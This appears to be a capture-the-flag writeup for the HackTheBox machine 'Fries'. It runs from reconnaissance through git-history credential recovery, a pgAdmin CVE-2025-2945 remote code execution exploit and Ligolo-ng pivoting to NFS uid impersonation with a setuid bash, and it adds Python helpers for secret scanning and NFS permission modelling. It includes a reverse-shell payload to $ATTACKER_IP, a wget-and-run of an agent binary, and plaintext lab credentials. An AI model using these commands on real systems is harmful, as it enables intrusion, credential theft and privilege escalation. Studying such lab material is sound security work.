Fries - HackTheBox Writeup

Machine Information

  • Difficulty: Hard
  • Operating System: Windows Server 2022 (Domain Controller) + Ubuntu (Web Server)
  • Domain: fries.htb

Initial Setup

Hosts Configuration

Add the following entries to /etc/hosts:

echo "$TARGET_IP fries.htb DC01.fries.htb code.fries.htb db-mgmt05.fries.htb" | sudo tee -a /etc/hosts

Reconnaissance

Nmap Scan

Full port scan to identify open services:

sudo nmap -A -sC -sS -v -p- --min-rate=1000 $TARGET_IP -oN nmap_full.txt

Key Findings:

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH 8.9p1 Ubuntu
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.18.0 (Ubuntu)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
443/tcp   open  ssl/http      nginx 1.18.0 (Ubuntu)
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp  open  ssl/ldap
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp  open  mc-nmf        .NET Message Framing

Environment Details:

  • Domain: fries.htb
  • Domain Controller: DC01.fries.htb
  • Certificate Authority: fries-DC01-CA

Subdomain Enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
  -u http://$TARGET_IP \
  -H "Host: FUZZ.fries.htb" \
  -mc 200

Discovered Subdomains:

  • code.fries.htb - Gitea instance
  • db-mgmt05.fries.htb - pgAdmin interface
  • https://fries.htb (the base domain itself, over HTTPS) - Password Management portal

Matching only on 200 (-mc 200) hides vhosts that answer with a redirect; if the default vhost returns a fixed-size page, filter on response size (-fs) instead of status so nothing is missed.

Web Application Enumeration

Gitea Instance (code.fries.htb)

Accessing http://code.fries.htb reveals a Gitea repository hosting application code.

Key Intelligence from Repository:

  1. Flask application with PostgreSQL backend
  2. Database management interface at db-mgmt05.fries.htb
  3. Database name: ps_db
  4. Key personnel: Dylan, Mike, Dale (infrastructure access)
  5. Contact: [email protected]

Git History Analysis

Secrets that were later deleted from the working tree are still present in earlier commits, so walk the full history of every ref rather than only the current files:

git clone http://code.fries.htb/fries/fries-app.git
cd fries-app
git log -p --all | grep -i "postgresql\|postgres\|database_url\|sqlalchemy" -B 5 -A 5

Credentials Found:

DATABASE_URL=postgresql://root:[email protected]:5432/ps_db
SECRET_KEY=[REDACTED]
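A small scanner for this kind of history search, added here as an example and not code from the fries-app repository or the writeup: it walks `git log -p --all` output, keeps only added/removed diff lines, flags connection strings with an embedded password and SECRET/PASS/TOKEN-style assignments, records the commit and whether that commit added or removed the line, and lists every value that must be rotated because it was committed at any point. The log text below is constructed for the example; its commit hashes, the host 10.0.0.5 and the values in it are made up.

```python
import re
from dataclasses import dataclass

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")
# scheme://user:password@host   e.g. postgresql://root:pw@10.0.0.5:5432/db
URL_CRED_RE = re.compile(r"\b([a-z][a-z0-9+.-]*)://([^:/@\s]+):([^@\s]+)@([^\s/:]+)", re.I)
# NAME=value where NAME looks like a secret (SECRET_KEY, DB_PASS, API_TOKEN, ...)
ASSIGN_RE = re.compile(
    r"\b([A-Z0-9_]*(?:SECRET|PASSWORD|PASS|TOKEN|API_KEY)[A-Z0-9_]*)\s*=\s*['\"]?([^'\"\s]+)",
    re.I,
)


@dataclass(frozen=True)
class Finding:
    commit: str   # commit in whose diff the line appears
    state: str    # "added" or "removed" by that commit
    name: str     # what the secret belongs to (variable name or scheme://user@host)
    secret: str   # the credential itself


def scan_git_log(log_text):
    """Return every credential found on added or removed diff lines, newest commit first."""
    findings = []
    commit = None
    for raw in log_text.splitlines():
        m = COMMIT_RE.match(raw)
        if m:
            commit = m.group(1)
            continue
        # Only +/- lines carry file contents; the ---/+++ file headers are not content.
        if not raw or raw[0] not in "+-" or raw.startswith(("+++", "---")):
            continue
        state = "added" if raw[0] == "+" else "removed"
        line = raw[1:]
        url_hits = list(URL_CRED_RE.finditer(line))
        for um in url_hits:
            scheme, user, password, host = um.groups()
            findings.append(Finding(commit, state, f"{scheme}://{user}@{host}", password))
        if url_hits:
            continue  # do not report the same line twice via the NAME=value rule
        for am in ASSIGN_RE.finditer(line):
            name, value = am.groups()
            if value.startswith(("$", "<", "{")):  # placeholder, not a real value
                continue
            findings.append(Finding(commit, state, name.upper(), value))
    return findings


def secrets_to_rotate(findings):
    """Anything ever committed is burned, whether or not a later commit removed it."""
    return sorted({(f.name, f.secret) for f in findings})


def redact(finding):
    """Display form for a report: keep two characters so the value can be recognised."""
    s = finding.secret
    return s[:2] + "*" * max(len(s) - 2, 0)


# Constructed `git log -p --all` output (made up for this example): the newer commit
# "removes" a .env that the older commit added, so HEAD looks clean but history is not.
SAMPLE_LOG = """\
commit a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
Author: dev <dev@example.invalid>
Date:   Mon May 26 13:13:00 2025 +0000

    remove credentials from repo

diff --git a/.env b/.env
index 1111111..2222222 100644
--- a/.env
+++ b/.env
@@ -1,2 +1,2 @@
-DATABASE_URL=postgresql://root:S3cretP4ss@10.0.0.5:5432/ps_db
-SECRET_KEY=0123456789abcdef
+DATABASE_URL=${DATABASE_URL}
+SECRET_KEY=${SECRET_KEY}

commit ffffffffffffffffffffffffffffffffffffffff
Author: dev <dev@example.invalid>
Date:   Fri May 23 09:00:00 2025 +0000

    add env file

diff --git a/.env b/.env
new file mode 100644
index 0000000..1111111
--- /dev/null
+++ b/.env
@@ -0,0 +1,2 @@
+DATABASE_URL=postgresql://root:S3cretP4ss@10.0.0.5:5432/ps_db
+SECRET_KEY=0123456789abcdef
"""

if __name__ == "__main__":
    found = scan_git_log(SAMPLE_LOG)
    for f in found:
        print(f"{f.commit[:8]} {f.state:7} {f.name} = {redact(f)}")
    print("rotate:", [name for name, _ in secrets_to_rotate(found)])
```

Feed it real output with `git log -p --all > history.txt` and `scan_git_log(open("history.txt").read())`; the "removed" state on a finding is the interesting one, since it means the value is absent from the checkout but still one `git show` away.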

pgAdmin Interface (db-mgmt05.fries.htb)

The subdomain hosts pgAdmin 9.1. Releases before 9.2 are affected by CVE-2025-2945, an authenticated remote code execution flaw in which user-controlled request data reaches a Python eval() on the server, so a valid pgAdmin login plus a database the query tool can connect to are enough to run code in the pgAdmin process.

Login Credentials (from Gitea repository):

Username: [email protected]
Password: D4LE11maan!!

Exploitation - Initial Access

CVE-2025-2945 - pgAdmin RCE

# Clone exploit
git clone https://github.com/Cycloctane/cve-2025-2945-poc.git
cd cve-2025-2945-poc

# Start listener (separate terminal)
nc -lvnp 4444

# Execute exploit. It needs a pgAdmin login and a database the query tool can reach,
# which is why the db-* arguments are passed along with the web credentials.
python3 exp.py \
  --target-url http://db-mgmt05.fries.htb \
  --username [email protected] \
  --password 'D4LE11maan!!' \
  --db-user root \
  --db-pass 'PsqLR00tpaSS11' \
  --db-name ps_db \
  --payload "__import__('os').system('bash -c \"bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1\"')"

Result: a shell as the pgadmin user inside a Docker container.

Post-Exploitation - Docker Container

Network Pivoting with Ligolo-ng

To reach the internal Docker network and pivot further, run the Ligolo-ng proxy on the attacker machine and the agent inside the container.

On attacker machine:

# Download Ligolo-ng (proxy runs on the attacker side, agent on the container)
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

# Extract
tar -xzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar -xzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

# Start proxy (self-signed certificate, so the agent is run with -ignore-cert)
./proxy -selfcert -laddr 0.0.0.0:11601

# Serve the agent binary to the container
python3 -m http.server 8000

On compromised container:

# Download and execute agent
wget http://$ATTACKER_IP:8000/agent
chmod +x agent
./agent -connect $ATTACKER_IP:11601 -ignore-cert

In the proxy console, select the new session and start the tunnel before adding routes:

ligolo-ng » session
ligolo-ng » start

Add routing on the attacker machine:

# Route Docker network
sudo ip route add 172.18.0.0/24 dev ligolo

# Route internal network (discovered later)
sudo ip route add 192.168.100.0/24 dev ligolo

Container Enumeration

Running linpeas.sh in the container shows the pgAdmin environment variables, which carry another credential:

[email protected]
PGADMIN_DEFAULT_PASSWORD=Friesf00Ds2025!!

linpeas also flags a writable /etc/passwd inside the container (container-local, not pursued further) and an NFS export on the Docker host, which can be queried from the container or through the tunnel:

showmount -e 172.18.0.1
# Output: /srv/web.fries.htb *

The trailing * means the export is offered to every client, so the only thing controlling access is the uid/gid the client asserts.

NFS Mount Analysis

# Mount NFS share (from the attacker machine, through the tunnel)
sudo mkdir -p /mnt/nfs_fries
sudo mount -t nfs 172.18.0.1:/srv/web.fries.htb /mnt/nfs_fries
cd /mnt/nfs_fries

ls -la
# drw-r-xr-x 5  655 root     4096 May 28 12:17 .
# drwxr-xr-x 3 root root     4096 Nov 23 00:43 ..
# drwxrwx--- 2 root 59605603 4096 May 26 13:13 certs
# drwxrwxrwx 2 root root     4096 May 31 06:11 shared
# drwxr----- 5 user  user      4096 Jun  7 08:30 webroot

The names shown (root, user) are only the attacker's own /etc/passwd resolving the numeric owners; 655 and 59605603 have no local match and appear raw. Use ls -ln to see the numbers for every entry, because numbers are all the server compares. Only shared is writable by everyone; certs is limited to gid 59605603 and webroot to its owner.

Network Discovery

Docker Network (172.18.0.0/24):

  • 172.18.0.1 - Docker Gateway/Host
  • 172.18.0.3 - PostgreSQL Database
  • 172.18.0.4 - pgAdmin (compromised)

Internal Network (192.168.100.0/24):

  • 192.168.100.1 - DC01 (Domain Controller)
  • 192.168.100.2 - WEB server

# DNS query from container
nslookup dc01.fries.htb
# Output: 192.168.100.1

Scanning Internal Network

# Connect scan through the tunnel, ping discovery disabled
nmap -sT -Pn 192.168.100.1-2 -p- --min-rate 1000

  • 192.168.100.1 (DC01): Domain Controller services
  • 192.168.100.2 (WEB): SSH, HTTP, HTTPS, NFS, RPC


Lateral Movement - Web Server Access

Password Spraying

The credentials collected so far (Gitea, the Git history and the pgAdmin container environment) were tested against SSH on the web server.

Success: SSH access as the svc user with the password Friesf00Ds2025!! (the PGADMIN_DEFAULT_PASSWORD value, reused).

Privilege Escalation - NFS User Impersonation

The export uses AUTH_SYS, the NFS default: the server trusts whatever numeric uid/gid the client kernel puts on each request, and root_squash only remaps uid 0. Any uid/gid we can create on our own machine therefore becomes that identity on the share. The numbers to impersonate (barman = uid 117, "infra managers" = gid 59605603) are the ones the web server uses; confirm them in /etc/passwd and /etc/group there as svc.

From WEB server (as svc):

# Copy the web server's own bash into the world-writable shared folder
# (the target's binary avoids libc mismatches with a copy from the attacker box)
cp /bin/bash /srv/web.fries.htb/shared/target_bash

From attacker machine:

# Create matching groups and user (names are arbitrary; only the numeric ids matter)
sudo groupadd -g 120 barman_group          # not needed by the steps below
sudo groupadd -g 59605603 infra_managers
sudo useradd -u 117 -g 59605603 -M -s /bin/bash barman_local

# Copy the binary as uid 117 / gid 59605603 so the server records that owner and group,
# then set setuid+setgid (6777). -M created no home directory, so su - warns about it
# and continues.
sudo su - barman_local -c "cp /mnt/nfs_fries/shared/target_bash /mnt/nfs_fries/shared/bash2"
sudo su - barman_local -c "chmod 6777 /mnt/nfs_fries/shared/bash2"

Back on WEB server:

# /srv/web.fries.htb is a local filesystem on the web server (it is the export, not a
# client mount), so the setuid bit is honoured there. -p stops bash from dropping the
# effective ids back to the real ones.
cd /srv/web.fries.htb/shared
./bash2 -p

# Verify escalated privileges: euid/egid come from the setuid/setgid bits on bash2
id
# uid=1000(svc) euid=117(barman) egid=59605603(infra managers)
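To make the reasoning behind this step concrete, here is an added model (example code, not a tool from the writeup) of the access decision an AUTH_SYS NFS server makes. It parses `ls -ln` output, applies root_squash, reports which numeric uid or gid to fake locally for a given directory, and computes the euid/egid that a setuid/setgid binary on the share hands to whoever executes it. The listings are constructed `ls -ln` renderings of the share above: 655, 117 and 59605603 are the numbers from this writeup, root = 0 is the Unix convention, and 1001 for the `user` account is an assumption.

```python
import re
from dataclasses import dataclass

# Under AUTH_SYS (sec=sys) the server believes the numeric ids the client sends;
# root_squash only rewrites uid/gid 0 to the anonymous id (default 65534).
NOBODY = 65534

# `ls -ln` line: mode, links, uid, gid, size, month, day, time-or-year, name
LS_LN_RE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\d+)\s+(\d+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$"
)


@dataclass(frozen=True)
class Entry:
    mode: str  # ten-character mode string, e.g. "drwxrwx---" or "-rwsrwsrwx"
    uid: int
    gid: int
    name: str


def parse_ls_ln(text):
    """Parse `ls -ln` output; numeric ids are what the server actually compares."""
    entries = []
    for line in text.splitlines():
        m = LS_LN_RE.match(line.strip())
        if m:
            mode, uid, gid, name = m.groups()
            entries.append(Entry(mode, int(uid), int(gid), name))
    return entries


def _bits(triplet):
    """rwx triplet -> granted bits; s/t in the exec slot still mean executable."""
    flags = (triplet[0] == "r", triplet[1] == "w", triplet[2] in "xst")
    return {b for b, ok in zip("rwx", flags) if ok}


def squash(uid, gids, root_squash=True):
    """Apply root_squash to the identity the client asserted."""
    if not root_squash:
        return uid, set(gids)
    return (NOBODY if uid == 0 else uid), {NOBODY if g == 0 else g for g in gids}


def access(entry, uid, gids, root_squash=True):
    """Bits the server grants (uid, gids) on entry: owner, then group, then other class."""
    uid, gids = squash(uid, gids, root_squash)
    if uid == entry.uid:
        return _bits(entry.mode[1:4])
    if entry.gid in gids:
        return _bits(entry.mode[4:7])
    return _bits(entry.mode[7:10])


def ways_in(entry, want="rw", root_squash=True):
    """Which single id to create locally (useradd -u / groupadd -g) to get `want` on entry."""
    need = set(want)
    ways = []
    if need <= _bits(entry.mode[1:4]) and not (root_squash and entry.uid == 0):
        ways.append(("uid", entry.uid))
    if need <= _bits(entry.mode[4:7]) and not (root_squash and entry.gid == 0):
        ways.append(("gid", entry.gid))
    return ways


def effective_ids(entry, uid, gid):
    """(euid, egid) a process gets by executing entry, i.e. what `id` reports afterwards."""
    euid = entry.uid if entry.mode[3] in "sS" else uid
    egid = entry.gid if entry.mode[6] in "sS" else gid
    return euid, egid


# Constructed `ls -ln` rendering of the share root (uid 1001 for "user" is assumed).
SAMPLE_SHARE = """\
drwxr-xr-x 5  655        0 4096 May 28 12:17 .
drwxrwx--- 2    0 59605603 4096 May 26 13:13 certs
drwxrwxrwx 2    0        0 4096 May 31 06:11 shared
drwxr----- 5 1001     1001 4096 Jun  7 08:30 webroot
"""

# Constructed `ls -ln shared` after the chmod 6777 performed as the uid-117 local user.
SAMPLE_SHARED_DIR = """\
-rwsrwsrwx 1  117 59605603 1396520 Jun  7 09:00 bash2
"""

if __name__ == "__main__":
    svc = (1000, {1000})  # svc on the web server, per the `id` output above
    for e in parse_ls_ln(SAMPLE_SHARE):
        print(f"{e.name:8} as svc: {sorted(access(e, *svc))}  ids giving rw: {ways_in(e)}")
    bash2 = parse_ls_ln(SAMPLE_SHARED_DIR)[0]
    print("executing bash2 as svc yields euid/egid:", effective_ids(bash2, 1000, 1000))
```

Run against a real listing with `parse_ls_ln(subprocess.check_output(["ls", "-ln", "/mnt/nfs_fries"], text=True))`; `ways_in` on the `certs` entry is what tells you that gid 59605603 is the identity worth forging, and that uid 0 would get you nothing because of root_squash.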